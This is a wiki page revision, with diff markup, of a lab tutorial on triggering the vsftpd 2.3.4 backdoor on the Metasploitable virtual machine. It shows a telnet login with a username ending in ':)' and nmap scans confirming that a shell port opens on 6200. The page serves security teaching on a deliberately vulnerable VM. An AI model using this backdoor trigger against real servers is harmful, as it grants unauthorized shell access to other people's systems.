Revision as of 14:35, 25 March 2016

The Background

VSFPT is an ftp server program. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell.

If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)

Opening the Backdoor

The procedure for opening a backdoor on port 6200 with VSFTP is as follows:

We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:

Now, in another window, we open the backdoor:

root@morpheus:~# telnet 10.0.0.27 21
Trying 10.0.0.27...
Connected to 10.0.0.27.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass doesnotmatter

You can close that window - you're done with it.

Now take a look at the same port 6200 with nmap:

root@morpheus:~# nmap -sS -p 6200 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:34 PDT
Nmap scan report for 10.0.0.27
Host is up (0.0010s latency).
PORT     STATE SERVICE
6200/tcp open  unknown
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

@@ Line 12: / Line 12: @@
 <pre>
-root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27
-Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT
-Nmap scan report for 10.0.0.27
-Host is up (0.00083s latency).
-PORT     STATE  SERVICE VERSION
-/tcp closed unknown
-MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
-Too many fingerprints match this host to give specific OS details
-Network Distance: 1 hop
-TRACEROUTE
-HOP RTT     ADDRESS
-   0.83 ms 10.0.0.27
-OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
-Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
 </pre>
@@ Line 49: / Line 32: @@
 <pre>
-root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27
+root@morpheus:~# nmap -sS -p 6200 10.0.0.27
-Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT
+Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:34 PDT
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
-WARNING: RST from 10.0.0.27 port 6200 -- is this port really open?
 Nmap scan report for 10.0.0.27
-Host is up (0.00088s latency).
+Host is up (0.0010s latency).
-PORT     STATE SERVICE VERSION
+PORT     STATE SERVICE
 /tcp open  unknown
-service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
-SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge
-SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh:
-SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n");
 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
-Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
-Device type: general purpose
-Running: Linux 2.4.X
-OS CPE: cpe:/o:linux:linux_kernel:2.4.21
-OS details: Linux 2.4.21
-Network Distance: 1 hop
-TRACEROUTE
-HOP RTT     ADDRESS
-   0.88 ms 10.0.0.27
-OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
-Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds
 </pre>

Metasploitable/VSFTP: Difference between revisions

From charlesreid1

Revision as of 14:35, 25 March 2016

The Background

Opening the Backdoor